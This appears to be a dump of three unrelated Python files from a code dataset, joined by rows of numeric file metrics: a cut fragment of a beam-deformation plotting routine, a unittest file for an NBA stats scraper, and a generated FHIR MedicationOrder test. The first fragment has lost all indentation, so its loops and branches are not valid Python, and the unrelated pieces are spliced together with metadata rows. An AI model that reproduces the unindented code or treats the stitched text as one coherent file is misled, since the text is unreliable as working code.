d5 = (d1 / 6.0) * ( ( (glc.b - d9)**3.0 ) - ( (glc.b - d9) * glc.b ) )
d4 = -d5
d6 = (d1 / 2.0) * ( ((glc.b - d9) * glc.b) - ((glc.b - d9)**2) ) + d5
d10 = glc.a / 4.0
d12 = 0.1
d13 = 0.1
d7 = 0
d8 = 0
for k in range(1,5):
d14 = k * d10
d8 = d13 + d14
d7 = (d4 * d14) + d12
x1.append(d7)
y1.append(d8)
d12 = d7
d13 = d8
d10 = glc.b/4.0
for k in range(1,5):
d14 = k * d10
d7 = d14 + d12
if (d14 < d9):
d8 = d13 + (d1 / 6.0) * ( (glc.b - d9) / glc.b ) * d14 * d14 * d14 + (d5 * d14)
else:
d8 = d13 + d1 / 6.0 * (glc.b - d9) / glc.b * d14 * d14 * d14 + d5 * d14 - d1 / 6.0 * ((d14 - d9)**3.0)
x2.append(d7)
y2.append(d8)
d12 = d7
d13 = d8
d10 = glc.a/4.0
for k in range(1,5):
d14 = k * d10
d8 = d13 - d14
d7 = d12 + d6 * d14
x3.append(d7)
y3.append(d8)
#output:
x = [0.1] + x1 + x2 + x3
y = [0.1] + y1 + y2 + y3
f.pts.data = dict(x = x, y = y )
def side3(f,paramInt,i):
'''Calculates the deformation of the right hand side (side 3)'''
x1 = []
x2 = []
x3 = []
y1 = []
y2 = []
y3 = []
#change arrow:
if i<0:
#f.arrow_source.data = dict(xS= [0.78+i/glc.arr_scal], xE= [0.78],
#yS= [0.6 - (paramInt%70)*(1.0/60)], yE=[0.6 - (paramInt%70)*(1.0/60)], lW = [abs(i/glc.arr_scal)] )
f.arrow_source.stream(dict(xS= [0.78+i/glc.arr_scal], xE= [0.78],
yS= [0.6 - (paramInt%70)*(1.0/60)], yE=[0.6 - (paramInt%70)*(1.0/60)], lW = [abs(i/glc.arr_scal)] ),rollover=1)
f.label.data = dict(x = [0.78+i/glc.arr_scal], y = [0.6 - (paramInt%70)*(1.0/60)], name = [f.name])
elif i>0:
#f.arrow_source.data = dict(xS= [0.82+i/glc.arr_scal], xE= [0.82],
#yS= [0.6 - (paramInt%70)*(1.0/60)], yE=[0.6 - (paramInt%70)*(1.0/60)], lW = [abs(i/glc.arr_scal)] )
f.arrow_source.stream(dict(xS= [0.82+i/glc.arr_scal], xE= [0.82],
yS= [0.6 - (paramInt%70)*(1.0/60)], yE=[0.6 - (paramInt%70)*(1.0/60)], lW = [abs(i/glc.arr_scal)] ),rollover=1)
f.label.data = dict(x = [0.82+i/glc.arr_scal], y = [0.6 - (paramInt%70)*(1.0/60)], name = [f.name])
else:
f.label.data = dict(x = [0.82+i/glc.arr_scal], y = [0.6 - (paramInt%70)*(1.0/60)], name = [f.name])
d1 = i / glc.FScale
d2 = (100 - paramInt) / 30.0 * glc.a
d3 = glc.a - d2
d9 = d1 * d2 / glc.b
d5 = 10 / glc.b * (d1 * glc.a / 20 * glc.b * glc.b - d9 * glc.b * glc.b * glc.b / 60)
d4 = -d5 - d1 / 2.0 * glc.a * glc.a
d6 = -d1 * glc.a * glc.b + d9 * glc.b * glc.b / 2.0 + d5
d10 = glc.a / 4.0
d12 = 0.1
d13 = 0.1
d7 = 0.0
d8 = 0.0
for k in range(1,5):
d14 = k * d10
d8 = d14 + d13
d7 = d1 / 6.0 * d14 * d14 * d14 + d4 * d14 + d12
x1.append(d7)
y1.append(d8)
d12 = d7
d13 = d8
d10 = glc.b/4.0
for k in range(1,5):
d14 = k * d10
d7 = d14 + d12
d8 = d13 - d1 * glc.a / 2.0 * d14 * d14 + d9 * d14 * d14 * d14 / 6.0 + d5 * d14
x2.append(d7)
y2.append(d8)
d12 = d7
d13 = d8
d10 = glc.a / 4.0
for k in range(1,5):
d14 = k * d10
d8 = d13 - d14
if (d14<d3):
d7 = d12 - d1 * d3 / 2.0 * d14 * d14 + d1 / 6.0 * d14 * d14 * d14 + d6 * d14
else:
d7 = d12 - d1 * d3 / 2.0 * d14 * d14 + d1 / 6.0 * d14 * d14 * d14 + d6 * d14 - d1 / 6.0 * ( (d14 - d3)**3.0)
x3.append(d7)
y3.append(d8)
#output:
x = [0.1] + x1 + x2 + x3
y = [0.1] + y1 + y2 + y3
f.pts.data = dict(x = x, y = y )
| 31.826255 | 120 | 0.436977 | 1,427 | 8,243 | 2.491941 | 0.078486 | 0.040495 | 0.064961 | 0.102081 | 0.834927 | 0.801181 | 0.767154 | 0.745501 | 0.732565 | 0.705849 | 0 | 0.182698 | 0.335315 | 8,243 | 258 | 121 | 31.949612 | 0.466326 | 0.158559 | 0 | 0.647059 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.016043 | false | 0 | 0.005348 | 0 | 0.02139 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
73e51ae97694b3ff1934f56f3c77f1f890801768 | 9,533 | py | Python | NBAStatScraper/test/test_players.py | tdowhy/NBAStatScraper | eef1fa8ebb39d9e36ca137f1200957c9f4406000 | [
"MIT"
] | null | null | null | NBAStatScraper/test/test_players.py | tdowhy/NBAStatScraper | eef1fa8ebb39d9e36ca137f1200957c9f4406000 | [
"MIT"
] | null | null | null | NBAStatScraper/test/test_players.py | tdowhy/NBAStatScraper | eef1fa8ebb39d9e36ca137f1200957c9f4406000 | [
"MIT"
] | 1 | 2021-01-16T11:19:36.000Z | 2021-01-16T11:19:36.000Z | import unittest
import sys
sys.path.append('../')
import players
class Test(unittest.TestCase):
def test_get_player_url(self):
'''
Test for a player who exists with no duplicate name.
'''
name = "James Harden"
extension = players.get_player_url(name)
self.assertEqual(extension, ['hardeja01'])
'''
Test for a player who exists and name is shorter than 5 characters.
'''
name = "Bol Bol"
extension = players.get_player_url(name)
self.assertEqual(extension, ['bolbo01'])
'''
Test name with multiple results.
'''
name = "Chris Johnson"
extension = players.get_player_url(name)
self.assertEqual(extension, ['johnsch03', 'johnsch04'])
@unittest.expectedFailure
def test_get_player_url_fail(self):
name = "James Harden"
extension = players.get_player_url(name)
self.assertEqual(extension, ['hardeja01', 'hardeja02'])
def test_get_game_stats(self):
fields = ['Season', 'Age', 'Tm', 'Lg', 'Pos', 'G', 'GS', 'MP', 'FG', 'FGA', 'FG%',
'3P', '3PA', '3P%', '2P', '2PA', '2P%', 'eFG%', 'FT', 'FTA', 'FT%', 'ORB',
'DRB', 'TRB', 'AST', 'STL', 'BLK', 'TOV', 'PF', 'PTS']
measurements = ['game', 'playoffGame']
for item in measurements:
name = "tatumja01"
df = players.get_career_player_stats(name, item)
self.assertCountEqual(list(df.columns), fields)
name = "jordami01"
df = players.get_career_player_stats(name, item)
self.assertCountEqual(list(df.columns), fields)
name = "jamesle01"
df = players.get_career_player_stats(name, item)
self.assertCountEqual(list(df.columns), fields)
@unittest.expectedFailure
def test_game_stats_fail(self):
name = "dowhyt01"
fields = ['Season', 'Age', 'Tm', 'Lg', 'Pos', 'G', 'GS', 'MP', 'FG', 'FGA', 'FG%',
'3P', '3PA', '3P%', '2P', '2PA', '2P%', 'eFG%', 'FT', 'FTA', 'FT%', 'ORB',
'DRB', 'TRB', 'AST', 'STL', 'BLK', 'TOV', 'PF', 'PTS']
measurements = ['game','playoffGame']
for item in measurements:
df = players.get_career_player_stats(name, item)
self.assertCountEqual(list(df.columns), fields)
def test_total_stats(self):
fields = ['Season', 'Age', 'Tm', 'Lg', 'Pos', 'G', 'GS', 'MP', 'FG', 'FGA', 'FG%',
'3P', '3PA', '3P%', '2P', '2PA', '2P%', 'eFG%', 'FT', 'FTA', 'FT%', 'ORB',
'DRB', 'TRB', 'AST', 'STL', 'BLK', 'TOV', 'PF', 'PTS', 'Trp Dbl']
measurements = ['total', 'playoffTotal']
for item in measurements:
name = "hardeja01"
df = players.get_career_player_stats(name, item)
self.assertCountEqual(list(df.columns), fields)
name = "jordami01"
df = players.get_career_player_stats(name, item)
self.assertCountEqual(list(df.columns), fields)
name = "jamesle01"
df = players.get_career_player_stats(name, item)
self.assertCountEqual(list(df.columns), fields)
@unittest.expectedFailure
def test_total_stats_fail(self):
name = "dowhyt01"
fields = ['Season', 'Age', 'Tm', 'Lg', 'Pos', 'G', 'GS', 'MP', 'FG', 'FGA', 'FG%',
'3P', '3PA', '3P%', '2P', '2PA', '2P%', 'eFG%', 'FT', 'FTA', 'FT%', 'ORB',
'DRB', 'TRB', 'AST', 'STL', 'BLK', 'TOV', 'PF', 'PTS', 'Trp Dbl']
measurements = ['total', 'playoffTotal']
for item in measurements:
df = players.get_career_player_stats(name, item)
self.assertCountEqual(list(df.columns), fields)
def test_min_stats(self):
fields = ['Season', 'Age', 'Tm', 'Lg', 'Pos', 'G', 'GS', 'MP', 'FG', 'FGA', 'FG%',
'3P', '3PA', '3P%', '2P', '2PA', '2P%', 'FT', 'FTA', 'FT%', 'ORB',
'DRB', 'TRB', 'AST', 'STL', 'BLK', 'TOV', 'PF', 'PTS']
measurements = ['min', 'playoffMin']
for item in measurements:
name = "bealbr01"
df = players.get_career_player_stats(name, item)
self.assertCountEqual(list(df.columns), fields)
name = "jordami01"
df = players.get_career_player_stats(name, item)
self.assertCountEqual(list(df.columns), fields)
name = "jamesle01"
df = players.get_career_player_stats(name, item)
self.assertCountEqual(list(df.columns), fields)
@unittest.expectedFailure
def test_min_stats_fail(self):
name = "dowhyt01"
fields = ['Season', 'Age', 'Tm', 'Lg', 'Pos', 'G', 'GS', 'MP', 'FG', 'FGA', 'FG%',
'3P', '3PA', '3P%', '2P', '2PA', '2P%', 'FT', 'FTA', 'FT%', 'ORB',
'DRB', 'TRB', 'AST', 'STL', 'BLK', 'TOV', 'PF', 'PTS']
measurements = ['min', 'playoffMin']
for item in measurements:
df = players.get_career_player_stats(name, item)
self.assertCountEqual(list(df.columns), fields)
def test_pos_stats(self):
fields = ['Season', 'Age', 'Tm', 'Lg', 'Pos', 'G', 'GS', 'MP', 'FG', 'FGA', 'FG%',
'3P', '3PA', '3P%', '2P', '2PA', '2P%', 'FT', 'FTA', 'FT%', 'ORB',
'DRB', 'TRB', 'AST', 'STL', 'BLK', 'TOV', 'PF', 'PTS', 'ORtg', 'DRtg']
measurements = ['pos', 'playoffPos']
for item in measurements:
name = "bealbr01"
df = players.get_career_player_stats(name, item)
self.assertCountEqual(list(df.columns), fields)
name = "jordami01"
df = players.get_career_player_stats(name, item)
self.assertCountEqual(list(df.columns), fields)
name = "jamesle01"
df = players.get_career_player_stats(name, item)
self.assertCountEqual(list(df.columns), fields)
@unittest.expectedFailure
def test_pos_stats_fail(self):
name = "dowhyt01"
fields = ['Season', 'Age', 'Tm', 'Lg', 'Pos', 'G', 'GS', 'MP', 'FG', 'FGA', 'FG%',
'3P', '3PA', '3P%', '2P', '2PA', '2P%', 'FT', 'FTA', 'FT%', 'ORB',
'DRB', 'TRB', 'AST', 'STL', 'BLK', 'TOV', 'PF', 'PTS', 'ORtg', 'DRtg']
measurements = ['min', 'playoffMin']
for item in measurements:
df = players.get_career_player_stats(name, item)
self.assertCountEqual(list(df.columns), fields)
def test_shooting_stats(self):
fields = ['Season', 'Age', 'Tm', 'Lg', 'Pos', 'G', 'MP', 'FG%', 'Dist.', '2P', '0-3', '3-10',
'10-16', '16-3P', '3P', '2P', '0-3', '3-10', '10-16', '16-3P', '3P', '2P', '3P', '%FGA',
'#', '%3PA', '3P%', 'Att.', '#']
measurements = ['shooting', 'playoffShooting']
for item in measurements:
name = "bealbr01"
df = players.get_career_player_stats(name, item)
self.assertCountEqual(list(df.columns), fields)
name = "jordami01"
df = players.get_career_player_stats(name, item)
self.assertCountEqual(list(df.columns), fields)
name = "jamesle01"
df = players.get_career_player_stats(name, item)
self.assertCountEqual(list(df.columns), fields)
@unittest.expectedFailure
def test_shooting_stats_fail(self):
name = "dowhyt01"
fields = ['Season', 'Age', 'Tm', 'Lg', 'Pos', 'G', 'MP', 'FG%', 'Dist', '2P', '0-3', '3-10',
'10-16', '16-3P', '3P', '2P', '0-3', '3-10', '10-16', '16-3P', '3P', '2P', '3P', '%FGA',
'#', '%3PA', '3P%', 'Att.', '#']
measurements = ['shooting', 'playoffShooting']
for item in measurements:
df = players.get_career_player_stats(name, item)
self.assertCountEqual(list(df.columns), fields)
def test_career_highs(self):
fields = ['Season', 'Age', 'Tm', 'Lg', 'MP', 'FG', 'FGA',
'3P', '3PA', '2P', '2PA', 'FT', 'FTA', 'ORB',
'DRB', 'TRB', 'AST', 'STL', 'BLK', 'TOV', 'PF', 'PTS', 'GmSc']
measurements = ['careerHighs', 'playoffCareerHighs']
for item in measurements:
name = "bealbr01"
df = players.get_career_player_stats(name, item)
self.assertCountEqual(list(df.columns), fields)
name = "jordami01"
df = players.get_career_player_stats(name, item)
self.assertCountEqual(list(df.columns), fields)
name = "jamesle01"
df = players.get_career_player_stats(name, item)
self.assertCountEqual(list(df.columns), fields)
@unittest.expectedFailure
def test_career_highs_fail(self):
name = "dowhyt01"
fields = ['Season', 'Age', 'Tm', 'Lg', 'MP', 'FG', 'FGA',
'3P', '3PA', '2P', '2PA', 'FT', 'FTA', 'ORB',
'DRB', 'TRB', 'AST', 'STL', 'BLK', 'TOV', 'PF', 'PTS', 'GmSc']
measurements = ['careerHighs', 'playoffCareerHighs']
for item in measurements:
df = players.get_career_player_stats(name, item)
self.assertCountEqual(list(df.columns), fields)
if __name__ == '__main__':
unittest.main() | 45.395238 | 107 | 0.513689 | 1,034 | 9,533 | 4.61412 | 0.106383 | 0.058688 | 0.060365 | 0.090547 | 0.920981 | 0.911339 | 0.900859 | 0.900859 | 0.900859 | 0.871306 | 0 | 0.027185 | 0.301584 | 9,533 | 210 | 108 | 45.395238 | 0.689396 | 0.005455 | 0 | 0.813953 | 0 | 0 | 0.166996 | 0 | 0 | 0 | 0 | 0 | 0.162791 | 1 | 0.081395 | false | 0 | 0.017442 | 0 | 0.104651 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
73f6a2f529fcb3dd5046d8126110e01c4c4d7311 | 28,858 | py | Python | fhir/resources/DSTU2/tests/test_medicationorder.py | mmabey/fhir.resources | cc73718e9762c04726cd7de240c8f2dd5313cbe1 | [
"BSD-3-Clause"
] | null | null | null | fhir/resources/DSTU2/tests/test_medicationorder.py | mmabey/fhir.resources | cc73718e9762c04726cd7de240c8f2dd5313cbe1 | [
"BSD-3-Clause"
] | null | null | null | fhir/resources/DSTU2/tests/test_medicationorder.py | mmabey/fhir.resources | cc73718e9762c04726cd7de240c8f2dd5313cbe1 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Generated from FHIR 1.0.2.7202 on 2019-05-14.
# 2019, SMART Health IT.
import io
import json
import os
import unittest
from . import medicationorder
from .fhirdate import FHIRDate
class MedicationOrderTests(unittest.TestCase):
def instantiate_from(self, filename):
datadir = os.environ.get("FHIR_UNITTEST_DATADIR") or ""
with io.open(os.path.join(datadir, filename), "r", encoding="utf-8") as handle:
js = json.load(handle)
self.assertEqual("MedicationOrder", js["resourceType"])
return medicationorder.MedicationOrder(js)
def testMedicationOrder1(self):
inst = self.instantiate_from("medicationorder-example-f005-enalapril.json")
self.assertIsNotNone(inst, "Must have instantiated a MedicationOrder instance")
self.implMedicationOrder1(inst)
js = inst.as_json()
self.assertEqual("MedicationOrder", js["resourceType"])
inst2 = medicationorder.MedicationOrder(js)
self.implMedicationOrder1(inst2)
def implMedicationOrder1(self, inst):
self.assertEqual(inst.dateWritten.date, FHIRDate("2011-05-01").date)
self.assertEqual(inst.dateWritten.as_json(), "2011-05-01")
self.assertEqual(inst.dispenseRequest.quantity.code, "46992007")
self.assertEqual(inst.dispenseRequest.quantity.system, "http://snomed.info/sct")
self.assertEqual(inst.dispenseRequest.quantity.value, 28)
self.assertEqual(
inst.dispenseRequest.validityPeriod.start.date, FHIRDate("2011-05-01").date
)
self.assertEqual(
inst.dispenseRequest.validityPeriod.start.as_json(), "2011-05-01"
)
self.assertEqual(inst.dosageInstruction[0].doseQuantity.code, "mg")
self.assertEqual(
inst.dosageInstruction[0].doseQuantity.system, "http://unitsofmeasure.org"
)
self.assertEqual(inst.dosageInstruction[0].doseQuantity.unit, "mg")
self.assertEqual(inst.dosageInstruction[0].doseQuantity.value, 5)
self.assertEqual(inst.dosageInstruction[0].route.coding[0].code, "386359008")
self.assertEqual(
inst.dosageInstruction[0].route.coding[0].display,
"Administration of drug or medicament via oral route",
)
self.assertEqual(
inst.dosageInstruction[0].route.coding[0].system, "http://snomed.info/sct"
)
self.assertEqual(
inst.dosageInstruction[0].siteCodeableConcept.coding[0].code, "181220002"
)
self.assertEqual(
inst.dosageInstruction[0].siteCodeableConcept.coding[0].display,
"Entire oral cavity",
)
self.assertEqual(
inst.dosageInstruction[0].siteCodeableConcept.coding[0].system,
"http://snomed.info/sct",
)
self.assertEqual(
inst.dosageInstruction[0].timing.repeat.boundsPeriod.start.date,
FHIRDate("2011-05-01").date,
)
self.assertEqual(
inst.dosageInstruction[0].timing.repeat.boundsPeriod.start.as_json(),
"2011-05-01",
)
self.assertEqual(inst.dosageInstruction[0].timing.repeat.frequency, 1)
self.assertEqual(inst.dosageInstruction[0].timing.repeat.period, 1)
self.assertEqual(inst.dosageInstruction[0].timing.repeat.periodUnits, "d")
self.assertEqual(inst.id, "f005")
self.assertEqual(
inst.identifier[0].system, "http://www.bmc.nl/portal/prescriptions"
)
self.assertEqual(inst.identifier[0].use, "official")
self.assertEqual(inst.identifier[0].value, "order9823343")
self.assertEqual(inst.reasonCodeableConcept.coding[0].code, "38341003")
self.assertEqual(
inst.reasonCodeableConcept.coding[0].display, "High blood pressure"
)
self.assertEqual(
inst.reasonCodeableConcept.coding[0].system, "http://snomed.info/sct"
)
self.assertEqual(inst.status, "active")
self.assertEqual(inst.text.status, "generated")
def testMedicationOrder2(self):
inst = self.instantiate_from("medicationorder-example-f004-metoprolol.json")
self.assertIsNotNone(inst, "Must have instantiated a MedicationOrder instance")
self.implMedicationOrder2(inst)
js = inst.as_json()
self.assertEqual("MedicationOrder", js["resourceType"])
inst2 = medicationorder.MedicationOrder(js)
self.implMedicationOrder2(inst2)
def implMedicationOrder2(self, inst):
self.assertEqual(inst.dateWritten.date, FHIRDate("2011-05-01").date)
self.assertEqual(inst.dateWritten.as_json(), "2011-05-01")
self.assertEqual(inst.dispenseRequest.quantity.code, "46992007")
self.assertEqual(inst.dispenseRequest.quantity.system, "http://snomed.info/sct")
self.assertEqual(inst.dispenseRequest.quantity.value, 90)
self.assertEqual(
inst.dispenseRequest.validityPeriod.start.date, FHIRDate("2011-05-01").date
)
self.assertEqual(
inst.dispenseRequest.validityPeriod.start.as_json(), "2011-05-01"
)
self.assertEqual(inst.dosageInstruction[0].doseQuantity.code, "mg")
self.assertEqual(
inst.dosageInstruction[0].doseQuantity.system, "http://unitsofmeasure.org"
)
self.assertEqual(inst.dosageInstruction[0].doseQuantity.unit, "mg")
self.assertEqual(inst.dosageInstruction[0].doseQuantity.value, 50)
self.assertEqual(inst.dosageInstruction[0].route.coding[0].code, "386359008")
self.assertEqual(
inst.dosageInstruction[0].route.coding[0].display,
"Administration of drug or medicament via oral route",
)
self.assertEqual(
inst.dosageInstruction[0].route.coding[0].system, "http://snomed.info/sct"
)
self.assertEqual(
inst.dosageInstruction[0].siteCodeableConcept.coding[0].code, "181220002"
)
self.assertEqual(
inst.dosageInstruction[0].siteCodeableConcept.coding[0].display,
"Entire oral cavity",
)
self.assertEqual(
inst.dosageInstruction[0].siteCodeableConcept.coding[0].system,
"http://snomed.info/sct",
)
self.assertEqual(
inst.dosageInstruction[0].timing.repeat.boundsPeriod.start.date,
FHIRDate("2011-05-01").date,
)
self.assertEqual(
inst.dosageInstruction[0].timing.repeat.boundsPeriod.start.as_json(),
"2011-05-01",
)
self.assertEqual(inst.dosageInstruction[0].timing.repeat.frequency, 1)
self.assertEqual(inst.dosageInstruction[0].timing.repeat.period, 1)
self.assertEqual(inst.dosageInstruction[0].timing.repeat.periodUnits, "d")
self.assertEqual(inst.id, "f004")
self.assertEqual(
inst.identifier[0].system, "http://www.bmc.nl/portal/prescriptions"
)
self.assertEqual(inst.identifier[0].use, "official")
self.assertEqual(inst.identifier[0].value, "order9845343")
self.assertEqual(inst.reasonCodeableConcept.coding[0].code, "38341003")
self.assertEqual(
inst.reasonCodeableConcept.coding[0].display, "High blood pressure"
)
self.assertEqual(
inst.reasonCodeableConcept.coding[0].system, "http://snomed.info/sct"
)
self.assertEqual(inst.status, "active")
self.assertEqual(inst.text.status, "generated")
def testMedicationOrder3(self):
inst = self.instantiate_from("medicationorder-example-f001-combivent.json")
self.assertIsNotNone(inst, "Must have instantiated a MedicationOrder instance")
self.implMedicationOrder3(inst)
js = inst.as_json()
self.assertEqual("MedicationOrder", js["resourceType"])
inst2 = medicationorder.MedicationOrder(js)
self.implMedicationOrder3(inst2)
def implMedicationOrder3(self, inst):
self.assertEqual(
inst.dateWritten.date, FHIRDate("2013-05-25T19:32:52+01:00").date
)
self.assertEqual(inst.dateWritten.as_json(), "2013-05-25T19:32:52+01:00")
self.assertEqual(inst.dispenseRequest.expectedSupplyDuration.code, "d")
self.assertEqual(
inst.dispenseRequest.expectedSupplyDuration.system,
"urn:oid:2.16.840.1.113883.6.8",
)
self.assertEqual(inst.dispenseRequest.expectedSupplyDuration.unit, "days")
self.assertEqual(inst.dispenseRequest.expectedSupplyDuration.value, 40)
self.assertEqual(inst.dispenseRequest.numberOfRepeatsAllowed, 20)
self.assertEqual(inst.dispenseRequest.quantity.code, "ug")
self.assertEqual(
inst.dispenseRequest.quantity.system, "urn:oid:2.16.840.1.113883.6.8"
)
self.assertEqual(inst.dispenseRequest.quantity.unit, "mcg")
self.assertEqual(inst.dispenseRequest.quantity.value, 100)
self.assertEqual(
inst.dispenseRequest.validityPeriod.end.date, FHIRDate("2013-05-30").date
)
self.assertEqual(
inst.dispenseRequest.validityPeriod.end.as_json(), "2013-05-30"
)
self.assertEqual(
inst.dispenseRequest.validityPeriod.start.date, FHIRDate("2013-04-08").date
)
self.assertEqual(
inst.dispenseRequest.validityPeriod.start.as_json(), "2013-04-08"
)
self.assertEqual(
inst.dosageInstruction[0].additionalInstructions.text,
"for use during pregnancy, contact physician",
)
self.assertEqual(inst.dosageInstruction[0].doseQuantity.code, "ml")
self.assertEqual(
inst.dosageInstruction[0].doseQuantity.system, "http://unitsofmeasure.org"
)
self.assertEqual(inst.dosageInstruction[0].doseQuantity.unit, "ml")
self.assertEqual(inst.dosageInstruction[0].doseQuantity.value, 10)
self.assertEqual(inst.dosageInstruction[0].route.coding[0].code, "394899003")
self.assertEqual(
inst.dosageInstruction[0].route.coding[0].display,
"oral administration of treatment",
)
self.assertEqual(
inst.dosageInstruction[0].route.coding[0].system, "http://snomed.info/sct"
)
self.assertEqual(
inst.dosageInstruction[0].siteCodeableConcept.coding[0].code, "181220002"
)
self.assertEqual(
inst.dosageInstruction[0].siteCodeableConcept.coding[0].display,
"Entire oral cavity",
)
self.assertEqual(
inst.dosageInstruction[0].siteCodeableConcept.coding[0].system,
"http://snomed.info/sct",
)
self.assertEqual(inst.dosageInstruction[0].text, "3 tot 4 maal daags 1 flacon")
self.assertEqual(
inst.dosageInstruction[0].timing.repeat.boundsPeriod.end.date,
FHIRDate("2013-11-05").date,
)
self.assertEqual(
inst.dosageInstruction[0].timing.repeat.boundsPeriod.end.as_json(),
"2013-11-05",
)
self.assertEqual(
inst.dosageInstruction[0].timing.repeat.boundsPeriod.start.date,
FHIRDate("2013-08-04").date,
)
self.assertEqual(
inst.dosageInstruction[0].timing.repeat.boundsPeriod.start.as_json(),
"2013-08-04",
)
self.assertEqual(inst.dosageInstruction[0].timing.repeat.frequency, 3)
self.assertEqual(inst.dosageInstruction[0].timing.repeat.period, 1)
self.assertEqual(inst.dosageInstruction[0].timing.repeat.periodUnits, "d")
self.assertEqual(inst.id, "f001")
self.assertEqual(
inst.identifier[0].system, "http://www.bmc/portal/prescriptions"
)
self.assertEqual(inst.identifier[0].use, "official")
self.assertEqual(inst.identifier[0].value, "order9837293")
self.assertEqual(inst.reasonCodeableConcept.coding[0].code, "13645005")
self.assertEqual(
inst.reasonCodeableConcept.coding[0].display,
"Chronic obstructive pulmonary disease",
)
self.assertEqual(
inst.reasonCodeableConcept.coding[0].system, "http://snomed.info/sct"
)
self.assertEqual(inst.status, "active")
self.assertEqual(inst.text.status, "generated")
def testMedicationOrder4(self):
inst = self.instantiate_from("medicationorder-example-f201-salmeterol.json")
self.assertIsNotNone(inst, "Must have instantiated a MedicationOrder instance")
self.implMedicationOrder4(inst)
js = inst.as_json()
self.assertEqual("MedicationOrder", js["resourceType"])
inst2 = medicationorder.MedicationOrder(js)
self.implMedicationOrder4(inst2)
def implMedicationOrder4(self, inst):
self.assertEqual(inst.dateWritten.date, FHIRDate("2013-03-11").date)
self.assertEqual(inst.dateWritten.as_json(), "2013-03-11")
self.assertEqual(inst.dosageInstruction[0].doseQuantity.code, "PUFF")
self.assertEqual(
inst.dosageInstruction[0].doseQuantity.system,
"http://hl7.org/fhir/v3/orderableDrugForm",
)
self.assertEqual(inst.dosageInstruction[0].doseQuantity.value, 1)
self.assertEqual(
inst.dosageInstruction[0].maxDosePerPeriod.denominator.code, "259032004"
)
self.assertEqual(
inst.dosageInstruction[0].maxDosePerPeriod.denominator.system,
"http://snomed.info/sct",
)
self.assertEqual(
inst.dosageInstruction[0].maxDosePerPeriod.denominator.unit, "daily"
)
self.assertEqual(
inst.dosageInstruction[0].maxDosePerPeriod.denominator.value, 1
)
self.assertEqual(
inst.dosageInstruction[0].maxDosePerPeriod.numerator.code, "415215001"
)
self.assertEqual(
inst.dosageInstruction[0].maxDosePerPeriod.numerator.system,
"http://snomed.info/sct",
)
self.assertEqual(
inst.dosageInstruction[0].maxDosePerPeriod.numerator.unit, "puffs"
)
self.assertEqual(inst.dosageInstruction[0].maxDosePerPeriod.numerator.value, 2)
self.assertEqual(inst.dosageInstruction[0].method.coding[0].code, "320276009")
self.assertEqual(
inst.dosageInstruction[0].method.coding[0].display,
"Salmeterol+fluticasone 25/250ug inhaler",
)
self.assertEqual(
inst.dosageInstruction[0].method.coding[0].system, "http://snomed.info/sct"
)
self.assertEqual(inst.dosageInstruction[0].route.coding[0].code, "321667001")
self.assertEqual(
inst.dosageInstruction[0].route.coding[0].display, "Respiratory tract"
)
self.assertEqual(
inst.dosageInstruction[0].route.coding[0].system, "http://snomed.info/sct"
)
self.assertEqual(
inst.dosageInstruction[0].siteCodeableConcept.coding[0].code, "74262004"
)
self.assertEqual(
inst.dosageInstruction[0].siteCodeableConcept.coding[0].display,
"Oral cavity",
)
self.assertEqual(
inst.dosageInstruction[0].siteCodeableConcept.coding[0].system,
"http://snomed.info/sct",
)
self.assertEqual(
inst.dosageInstruction[0].text,
"aerosol 25/250ug/do 120do 2x - 1 dose - daily",
)
self.assertEqual(
inst.dosageInstruction[0].timing.repeat.boundsPeriod.end.date,
FHIRDate("2013-05-11").date,
)
self.assertEqual(
inst.dosageInstruction[0].timing.repeat.boundsPeriod.end.as_json(),
"2013-05-11",
)
self.assertEqual(
inst.dosageInstruction[0].timing.repeat.boundsPeriod.start.date,
FHIRDate("2013-03-11").date,
)
self.assertEqual(
inst.dosageInstruction[0].timing.repeat.boundsPeriod.start.as_json(),
"2013-03-11",
)
self.assertEqual(inst.dosageInstruction[0].timing.repeat.frequency, 2)
self.assertEqual(inst.dosageInstruction[0].timing.repeat.period, 1)
self.assertEqual(inst.dosageInstruction[0].timing.repeat.periodUnits, "d")
self.assertEqual(inst.id, "f201")
self.assertEqual(inst.status, "active")
self.assertEqual(inst.text.status, "generated")
def testMedicationOrder5(self):
inst = self.instantiate_from("medicationorder-example-f203-paracetamol.json")
self.assertIsNotNone(inst, "Must have instantiated a MedicationOrder instance")
self.implMedicationOrder5(inst)
js = inst.as_json()
self.assertEqual("MedicationOrder", js["resourceType"])
inst2 = medicationorder.MedicationOrder(js)
self.implMedicationOrder5(inst2)
def implMedicationOrder5(self, inst):
self.assertEqual(inst.dateWritten.date, FHIRDate("2013-04-04").date)
self.assertEqual(inst.dateWritten.as_json(), "2013-04-04")
self.assertEqual(
inst.dosageInstruction[0].maxDosePerPeriod.denominator.code, "258702006"
)
self.assertEqual(
inst.dosageInstruction[0].maxDosePerPeriod.denominator.system,
"http://snomed.info/sct",
)
self.assertEqual(
inst.dosageInstruction[0].maxDosePerPeriod.denominator.unit, "hours"
)
self.assertEqual(
inst.dosageInstruction[0].maxDosePerPeriod.denominator.value, 24
)
self.assertEqual(
inst.dosageInstruction[0].maxDosePerPeriod.numerator.code, "258684004"
)
self.assertEqual(
inst.dosageInstruction[0].maxDosePerPeriod.numerator.system,
"http://snomed.info/sct",
)
self.assertEqual(
inst.dosageInstruction[0].maxDosePerPeriod.numerator.unit, "milligram"
)
self.assertEqual(
inst.dosageInstruction[0].maxDosePerPeriod.numerator.value, 3000
)
self.assertEqual(inst.dosageInstruction[0].method.coding[0].code, "322236009")
self.assertEqual(
inst.dosageInstruction[0].method.coding[0].display,
"Paracetamol 500mg tablet",
)
self.assertEqual(
inst.dosageInstruction[0].method.coding[0].system, "http://snomed.info/sct"
)
